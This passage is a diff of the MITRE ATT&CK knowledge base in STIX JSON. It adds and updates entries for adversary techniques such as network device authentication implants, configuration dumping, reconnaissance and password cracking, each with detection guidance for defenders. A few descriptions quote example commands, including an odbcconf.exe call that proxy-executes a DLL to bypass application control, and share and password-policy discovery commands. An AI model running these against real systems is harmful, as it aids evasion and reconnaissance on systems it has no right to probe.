Cisco IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "description": "Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.\n\n[Modify System Image](https://attack.mitre.org/techniques/T1601) may include implanted code to the operating system for network devices to provide access for adversaries using a specific password. The modification includes a specific password which is implanted in the operating system image via the patch. Upon authentication attempts, the inserted code will first check to see if the user input is the password. If so, access is granted. Otherwise, the implanted code will pass the credentials on for verification of potentially valid credentials.(Citation: FireEye - Synful Knock)", + "name": "Network Device Authentication", + "id": "attack-pattern--fa44a152-ac48-441e-a524-dd7b04b8adcd", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "modified": "2020-10-21T02:41:11.550Z", + "created": "2020-10-19T17:58:04.155Z", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": true, + "x_mitre_permissions_required": [ + "Administrator" + ], + "x_mitre_detection": "Consider verifying the checksum of the operating system file and verifying the image of the operating system in memory.(Citation: Cisco IOS Software Integrity Assurance - Image File Verification)(Citation: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification)\n\nDetection of this behavior may be difficult, detection efforts may be focused on closely related adversary behaviors, such as [Modify System Image](https://attack.mitre.org/techniques/T1601).", + "x_mitre_data_sources": [ + "File monitoring" + ], + "x_mitre_platforms": [ + "Network" + ] + }, + { + "id": "attack-pattern--818302b2-d640-477b-bf88-873120ce85c4", + "description": "Adversaries may abuse scripting or built-in command line interpreters (CLI) on network devices to execute malicious command and payloads. The CLI is the primary means through which users and administrators interact with the device in order to view system information, modify device operations, or perform diagnostic and administrative functions. CLIs typically contain various permission levels required for different commands. \n\nScripting interpreters automate tasks and extend functionality beyond the command set included in the network OS. The CLI and scripting interpreter are accessible through a direct console connection, or through remote means, such as telnet or secure shell (SSH).\n\nAdversaries can use the network CLI to change how network devices behave and operate. The CLI may be used to manipulate traffic flows to intercept or manipulate data, modify startup configuration parameters to load malicious system software, or to disable security features or logging to avoid detection. (Citation: Cisco Synful Knock Evolution)", + "name": "Network Device CLI", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1059.008", + "url": "https://attack.mitre.org/techniques/T1059/008" + }, + { + "source_name": "Cisco Synful Knock Evolution", + "url": "https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices", + "description": "Graham Holmes. (2015, October 8). Evolution of attacks on Cisco IOS devices. Retrieved October 19, 2020." + }, + { + "source_name": "Cisco IOS Software Integrity Assurance - Command History", + "url": "https://tools.cisco.com/security/center/resources/integrity_assurance.html#23", + "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Command History. Retrieved October 21, 2020." + } + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "execution" + } + ], + "modified": "2020-10-22T16:43:38.388Z", + "created": "2020-10-20T00:09:33.072Z", + "x_mitre_data_sources": [ + "Network device logs", + "Network device run-time memory", + "Network device command history", + "Network device configuration" + ], + "x_mitre_platforms": [ + "Network" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_version": "1.0", + "x_mitre_detection": "Consider reviewing command history in either the console or as part of the running memory to determine if unauthorized or suspicious commands were used to modify device configuration.(Citation: Cisco IOS Software Integrity Assurance - Command History)\n\nConsider comparing a copy of the network device configuration against a known-good version to discover unauthorized changes to the command interpreter. The same process can be accomplished through a comparison of the run-time memory, though this is non-trivial and may require assistance from the vendor.", + "x_mitre_permissions_required": [ + "Administrator", + "User" + ] + }, + { + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1602.002", + "url": "https://attack.mitre.org/techniques/T1602/002" + }, + { + "source_name": "US-CERT TA18-106A Network Infrastructure Devices 2018", + "url": "https://us-cert.cisa.gov/ncas/alerts/TA18-106A", + "description": "US-CERT. (2018, April 20). Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020." + }, + { + "source_name": "Cisco Blog Legacy Device Attacks", + "url": "https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954", + "description": "Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020." + }, + { + "source_name": "US-CERT TA18-068A 2018", + "url": "https://www.us-cert.gov/ncas/alerts/TA18-086A", + "description": "US-CERT. (2018, March 27). TA18-068A Brute Force Attacks Conducted by Cyber Actors. Retrieved October 2, 2019." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Network Device Configuration Dump", + "description": "Adversaries may access network configuration files to collect sensitive data about the device and the network. The network configuration is a file containing parameters that determine the operation of the device. The device typically stores an in-memory copy of the configuration while operating, and a separate configuration on non-volatile storage to load after device reset. Adversaries can inspect the configuration files to reveal information about the target network and its layout, the network device and its software, or identifying legitimate accounts and credentials for later use.\n\nAdversaries can use common management tools and protocols, such as Simple Network Management Protocol (SNMP) and Smart Install (SMI), to access network configuration files. (Citation: US-CERT TA18-106A Network Infrastructure Devices 2018) (Citation: Cisco Blog Legacy Device Attacks) These tools may be used to query specific data from a configuration repository or configure the device to export the configuration for later analysis. ", + "id": "attack-pattern--52759bf1-fe12-4052-ace6-c5b0cf7dd7fd", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "collection" + } + ], + "modified": "2020-10-22T01:45:55.144Z", + "created": "2020-10-20T00:08:21.745Z", + "x_mitre_data_sources": [ + "Netflow/Enclave netflow", + "Network protocol analysis", + "Packet capture" + ], + "x_mitre_permissions_required": [ + "Administrator" + ], + "x_mitre_detection": "Identify network traffic sent or received by untrusted hosts or networks. Configure signatures to identify strings that may be found in a network device configuration. (Citation: US-CERT TA18-068A 2018)", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Network" + ] + }, { "external_references": [ { @@ -17657,6 +20483,42 @@ "Windows" ] }, + { + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1590.006", + "url": "https://attack.mitre.org/techniques/T1590/006" + }, + { + "source_name": "Nmap Firewalls NIDS", + "url": "https://nmap.org/book/firewalls.html", + "description": "Nmap. (n.d.). Chapter 10. Detecting and Subverting Firewalls and Intrusion Detection Systems. Retrieved October 20, 2020." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Network Security Appliances", + "description": "Before compromising a victim, adversaries may gather information about the victim's network security appliances that can be used during targeting. Information about network security appliances may include a variety of details, such as the existence and specifics of deployed firewalls, content filters, and proxies/bastion hosts. Adversaries may also target information about victim network-based intrusion detection systems (NIDS) or other appliances related to defensive cybersecurity operations.\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598).(Citation: Nmap Firewalls NIDS) Information about network security appliances may also be exposed to adversaries via online or other accessible data sets (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).", + "id": "attack-pattern--6c2957f9-502a-478c-b1dd-d626c0659413", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "modified": "2020-10-24T04:04:13.578Z", + "created": "2020-10-02T16:01:35.350Z", + "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "PRE" + ] + }, { "created": "2017-05-31T21:30:43.915Z", "modified": "2020-03-11T19:55:53.828Z", @@ -17789,7 +20651,7 @@ "id": "attack-pattern--3489cfc5-640f-4bb3-a103-9137b97de79f", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "name": "Network Share Discovery", - "description": "Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network. \n\nFile sharing over a Windows network occurs over the SMB protocol. (Citation: Wikipedia Shared Resource) (Citation: TechNet Shared Folder) [Net](https://attack.mitre.org/software/S0039) can be used to query a remote system for available shared drives using the net view \\\\remotesystem command. It can also be used to query shared drives on the local system using net share.\n\nCloud virtual networks may contain remote network shares or file storage services accessible to an adversary after they have obtained access to a system. For example, AWS, GCP, and Azure support creation of Network File System (NFS) shares and Server Message Block (SMB) shares that may be mapped on endpoint or cloud-based systems.(Citation: Amazon Creating an NFS File Share)(Citation: Google File servers on Compute Engine)", + "description": "Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network. \n\nFile sharing over a Windows network occurs over the SMB protocol. (Citation: Wikipedia Shared Resource) (Citation: TechNet Shared Folder) [Net](https://attack.mitre.org/software/S0039) can be used to query a remote system for available shared drives using the net view \\\\remotesystem command. It can also be used to query shared drives on the local system using net share.", "external_references": [ { "source_name": "mitre-attack", @@ -17810,16 +20672,6 @@ "url": "https://technet.microsoft.com/library/cc770880.aspx", "description": "Microsoft. (n.d.). Share a Folder or Drive. Retrieved June 30, 2017.", "source_name": "TechNet Shared Folder" - }, - { - "source_name": "Amazon Creating an NFS File Share", - "url": "https://docs.aws.amazon.com/storagegateway/latest/userguide/CreatingAnNFSFileShare.html", - "description": "Amazon. (n.d.). Creating an NFS File Share. Retrieved October 23, 2019." - }, - { - "source_name": "Google File servers on Compute Engine", - "url": "https://cloud.google.com/solutions/filers-on-compute-engine", - "description": "Google Cloud. (2019, October 10). File servers on Compute Engine. Retrieved October 23, 2019." } ], "object_marking_refs": [ @@ -17832,7 +20684,7 @@ "phase_name": "discovery" } ], - "modified": "2020-03-15T00:59:10.149Z", + "modified": "2020-10-07T18:10:06.463Z", "created": "2017-12-14T16:46:06.044Z", "x_mitre_is_subtechnique": false, "x_mitre_contributors": [ @@ -17844,19 +20696,16 @@ "x_mitre_platforms": [ "macOS", "Windows", - "AWS", - "GCP", - "Azure", "Linux" ], - "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nNormal, benign system and network events related to legitimate remote system discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n\nIn cloud-based systems, native logging can be used to identify access to certain APIs and dashboards that may contain system information. Depending on how the environment is used, that data alone may not be sufficient due to benign use during normal operations.", + "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nNormal, benign system and network events related to legitimate remote system discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).", "x_mitre_data_sources": [ "Process monitoring", "Process command-line parameters", "Network protocol analysis", "Process use of network" ], - "x_mitre_version": "2.1" + "x_mitre_version": "3.0" }, { "created": "2017-05-31T21:30:41.399Z", @@ -17913,6 +20762,78 @@ ], "x_mitre_is_subtechnique": false }, + { + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1590.004", + "url": "https://attack.mitre.org/techniques/T1590/004" + }, + { + "source_name": "DNS Dumpster", + "url": "https://dnsdumpster.com/", + "description": "Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Network Topology", + "description": "Before compromising a victim, adversaries may gather information about the victim's network topology that can be used during targeting. Information about network topologies may include a variety of details, including the physical and/or logical arrangement of both external-facing and internal network environments. This information may also include specifics regarding network devices (gateways, routers, etc.) and other infrastructure.\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about network topologies may also be exposed to adversaries via online or other accessible data sets (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: DNS Dumpster) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).", + "id": "attack-pattern--34ab90a3-05f6-4259-8f21-621081fdaba5", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "modified": "2020-10-24T04:04:40.188Z", + "created": "2020-10-02T15:49:03.815Z", + "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "PRE" + ] + }, + { + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1590.003", + "url": "https://attack.mitre.org/techniques/T1590/003" + }, + { + "source_name": "Pentesting AD Forests", + "url": "https://www.slideshare.net/rootedcon/carlos-garca-pentesting-active-directory-forests-rooted2019", + "description": "Garc\u00eda, C. (2019, April 3). Pentesting Active Directory Forests. Retrieved October 20, 2020." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Network Trust Dependencies", + "description": "Before compromising a victim, adversaries may gather information about the victim's network trust dependencies that can be used during targeting. Information about network trusts may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access.\n\nAdversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about network trusts may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: Pentesting AD Forests) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).", + "id": "attack-pattern--36aa137f-5166-41f8-b2f0-a4cfa1b4133e", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "modified": "2020-10-24T04:05:03.816Z", + "created": "2020-10-02T15:47:59.457Z", + "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "PRE" + ] + }, { "external_references": [ { @@ -17954,10 +20875,18 @@ "created": "2017-05-31T21:30:45.613Z" }, { - "id": "attack-pattern--c21d5a77-d422-4a69-acd7-2c53c1faa34b", - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "name": "Non-Application Layer Protocol", - "description": "Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.(Citation: Wikipedia OSI) Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).\n\nICMP communication between hosts is one example. Because ICMP is part of the Internet Protocol Suite, it is required to be implemented by all IP-compatible hosts; (Citation: Microsoft ICMP) however, it is not as commonly monitored as other Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications.", + "created": "2017-05-31T21:31:10.728Z", + "modified": "2020-10-21T19:41:49.412Z", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "type": "attack-pattern", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], "external_references": [ { "source_name": "mitre-attack", @@ -17969,37 +20898,35 @@ "description": "Wikipedia. (n.d.). List of network protocols (OSI model). Retrieved December 4, 2014.", "source_name": "Wikipedia OSI" }, + { + "source_name": "Cisco Synful Knock Evolution", + "url": "https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices", + "description": "Graham Holmes. (2015, October 8). Evolution of attacks on Cisco IOS devices. Retrieved October 19, 2020." + }, { "url": "http://support.microsoft.com/KB/170292", "description": "Microsoft. (n.d.). Internet Control Message Protocol (ICMP) Basics. Retrieved December 1, 2014.", "source_name": "Microsoft ICMP" }, + { + "source_name": "Cisco Blog Legacy Device Attacks", + "url": "https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954", + "description": "Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020." + }, { "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf", "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", "source_name": "University of Birmingham C2" } ], - "object_marking_refs": [ - "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + "description": "Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.(Citation: Wikipedia OSI) Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).\n\nICMP communication between hosts is one example.(Citation: Cisco Synful Knock Evolution)\n Because ICMP is part of the Internet Protocol Suite, it is required to be implemented by all IP-compatible hosts; (Citation: Microsoft ICMP) however, it is not as commonly monitored as other Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications.", + "name": "Non-Application Layer Protocol", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "id": "attack-pattern--c21d5a77-d422-4a69-acd7-2c53c1faa34b", + "x_mitre_version": "2.1", + "x_mitre_contributors": [ + "Ryan Becwar" ], - "type": "attack-pattern", - "kill_chain_phases": [ - { - "kill_chain_name": "mitre-attack", - "phase_name": "command-and-control" - } - ], - "modified": "2020-03-11T15:09:26.624Z", - "created": "2017-05-31T21:31:10.728Z", - "x_mitre_is_subtechnique": false, - "x_mitre_platforms": [ - "Windows", - "Linux", - "macOS" - ], - "x_mitre_network_requirements": true, - "x_mitre_detection": "Analyze network traffic for ICMP messages or other protocols that contain abnormal data or are not normally seen within or exiting the network.\n\nAnalyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)\n\nMonitor and investigate API calls to functions associated with enabling and/or utilizing alternative communication channels.", "x_mitre_data_sources": [ "Host network interface", "Netflow/Enclave netflow", @@ -18008,10 +20935,15 @@ "Packet capture", "Process use of network" ], - "x_mitre_contributors": [ - "Ryan Becwar" + "x_mitre_detection": "Analyze network traffic for ICMP messages or other protocols that contain abnormal data or are not normally seen within or exiting the network.(Citation: Cisco Blog Legacy Device Attacks)\n\nAnalyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2) \n\nMonitor and investigate API calls to functions associated with enabling and/or utilizing alternative communication channels.", + "x_mitre_network_requirements": true, + "x_mitre_platforms": [ + "Windows", + "Linux", + "macOS", + "Network" ], - "x_mitre_version": "2.0" + "x_mitre_is_subtechnique": false }, { "external_references": [ @@ -18224,6 +21156,16 @@ "external_id": "T1499.001", "url": "https://attack.mitre.org/techniques/T1499/001" }, + { + "external_id": "CAPEC-469", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/469.html" + }, + { + "external_id": "CAPEC-482", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/482.html" + }, { "source_name": "Arbor AnnualDoSreport Jan 2018", "url": "https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf", @@ -18259,9 +21201,9 @@ "phase_name": "impact" } ], - "modified": "2020-03-29T01:43:29.320Z", + "modified": "2020-09-16T15:54:35.429Z", "created": "2020-02-20T15:27:18.581Z", - "x_mitre_version": "1.0", + "x_mitre_version": "1.1", "x_mitre_is_subtechnique": true, "x_mitre_impact_type": [ "Availability" @@ -18346,7 +21288,7 @@ "phase_name": "defense-evasion" } ], - "modified": "2020-06-20T22:14:08.350Z", + "modified": "2020-09-16T19:24:20.601Z", "created": "2017-05-31T21:30:32.662Z", "x_mitre_is_subtechnique": false, "x_mitre_version": "1.1", @@ -18383,6 +21325,52 @@ "Windows" ] }, + { + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1588", + "url": "https://attack.mitre.org/techniques/T1588" + }, + { + "source_name": "NationsBuying", + "description": "Nicole Perlroth and David E. Sanger. (2013, July 12). Nations Buying as Hackers Sell Flaws in Computer Code. Retrieved March 9, 2017.", + "url": "https://www.nytimes.com/2013/07/14/world/europe/nations-buying-as-hackers-sell-computer-flaws.html" + }, + { + "url": "https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/", + "description": "Bill Marczak and John Scott-Railton. (2016, August 24). The Million Dollar Dissident: NSO Group\u2019s iPhone Zero-Days used against a UAE Human Rights Defender. Retrieved December 12, 2016.", + "source_name": "PegasusCitizenLab" + }, + { + "description": "Fisher, D. (2012, October 31). Final Report on DigiNotar Hack Shows Total Compromise of CA Servers. Retrieved March 6, 2017.", + "source_name": "DiginotarCompromise", + "url": "https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Obtain Capabilities", + "description": "Before compromising a victim, adversaries may buy and/or steal capabilities that can be used during targeting. Rather than developing their own capabilities in-house, adversaries may purchase, freely download, or steal them. Activities may include the acquisition of malware, software (including licenses), exploits, certificates, and information relating to vulnerabilities. Adversaries may obtain capabilities to support their operations throughout numerous phases of the adversary lifecycle.\n\nIn addition to downloading free malware, software, and exploits from the internet, adversaries may purchase these capabilities from third-party entities. Third-party entities can include technology companies that specialize in malware and exploits, criminal marketplaces, or from individuals.(Citation: NationsBuying)(Citation: PegasusCitizenLab)\n\nIn addition to purchasing capabilities, adversaries may steal capabilities from third-party entities (including other adversaries). This can include stealing software licenses, malware, SSL/TLS and code-signing certificates, or raiding closed databases of vulnerabilities or exploits.(Citation: DiginotarCompromise)", + "id": "attack-pattern--ce0687a0-e692-4b77-964a-0784a8e54ff1", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "resource-development" + } + ], + "modified": "2020-10-22T18:22:21.135Z", + "created": "2020-10-01T01:56:24.776Z", + "x_mitre_detection": "Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control.", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "PRE" + ] + }, { "id": "attack-pattern--6e3bd510-6b33-41a4-af80-2d80f3ee0071", "description": "Adversaries may abuse odbcconf.exe to proxy execution of malicious payloads. Odbcconf.exe is a Windows utility that allows you to configure Open Database Connectivity (ODBC) drivers and data source names.(Citation: Microsoft odbcconf.exe) Odbcconf.exe is digitally signed by Microsoft.\n\nAdversaries may abuse odbcconf.exe to bypass application control solutions that do not account for its potential abuse. Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010), odbcconf.exe has a REGSVR flag that can be misused to execute DLLs (ex: odbcconf.exe /S /A {REGSVR \"C:\\Users\\Public\\file.dll\"}). (Citation: LOLBAS Odbcconf)(Citation: TrendMicro Squiblydoo Aug 2017)(Citation: TrendMicro Cobalt Group Nov 2017) \n", @@ -19212,6 +22200,11 @@ "external_id": "T1110.002", "url": "https://attack.mitre.org/techniques/T1110/002" }, + { + "external_id": "CAPEC-55", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/55.html" + }, { "url": "https://en.wikipedia.org/wiki/Password_cracking", "description": "Wikipedia. (n.d.). Password cracking. Retrieved December 23, 2015.", @@ -19232,7 +22225,7 @@ "phase_name": "credential-access" } ], - "modified": "2020-07-09T17:01:18.054Z", + "modified": "2020-09-16T15:39:59.041Z", "created": "2020-02-11T18:38:56.197Z", "x_mitre_data_sources": [ "Authentication logs", @@ -19242,7 +22235,7 @@ "User" ], "x_mitre_detection": "It is difficult to detect when hashes are cracked, since this is generally done outside the scope of the target network. Consider focusing efforts on detecting other adversary behavior used to acquire credential materials, such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or [Kerberoasting](https://attack.mitre.org/techniques/T1558/003).", - "x_mitre_version": "1.0", + "x_mitre_version": "1.1", "x_mitre_is_subtechnique": true, "x_mitre_platforms": [ "Linux", @@ -19341,9 +22334,14 @@ "url": "https://attack.mitre.org/techniques/T1110/001" }, { - "url": "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf", + "external_id": "CAPEC-49", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/49.html" + }, + { + "source_name": "Cylance Cleaver", "description": "Cylance. (2014, December). Operation Cleaver. Retrieved September 14, 2017.", - "source_name": "Cylance Cleaver" + "url": "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" }, { "source_name": "US-CERT TA18-068A 2018", @@ -19365,7 +22363,7 @@ "phase_name": "credential-access" } ], - "modified": "2020-03-29T17:11:46.504Z", + "modified": "2020-10-19T22:43:45.126Z", "created": "2020-02-11T18:38:22.617Z", "x_mitre_contributors": [ "Microsoft Threat Intelligence Center (MSTIC)" @@ -19378,7 +22376,7 @@ "User" ], "x_mitre_detection": "Monitor authentication logs for system and application login failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). If authentication failures are high, then there may be a brute force attempt to gain access to a system using legitimate credentials.", - "x_mitre_version": "1.0", + "x_mitre_version": "1.1", "x_mitre_is_subtechnique": true, "x_mitre_platforms": [ "Linux", @@ -19396,7 +22394,7 @@ "id": "attack-pattern--b6075259-dba3-44e9-87c7-e954f37ec0d5", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "name": "Password Policy Discovery", - "description": "Adversaries may attempt to access detailed information about the password policy used within an enterprise network. Password policies for networks are a way to enforce complex passwords that are difficult to guess or crack through [Brute Force](https://attack.mitre.org/techniques/T1110). This would help the adversary to create a list of common passwords and launch dictionary and/or brute force attacks which adheres to the policy (e.g. if the minimum password length should be 8, then not trying passwords such as 'pass123'; not checking for more than 3-4 passwords per account if the lockout is set to 6 as to not lock out accounts).\n\nPassword policies can be set and discovered on Windows, Linux, and macOS systems via various command shell utilities such as net accounts (/domain), chage -l , cat /etc/pam.d/common-password, and pwpolicy getaccountpolicies.(Citation: Superuser Linux Password Policies) (Citation: Jamf User Password Policies)", + "description": "Adversaries may attempt to access detailed information about the password policy used within an 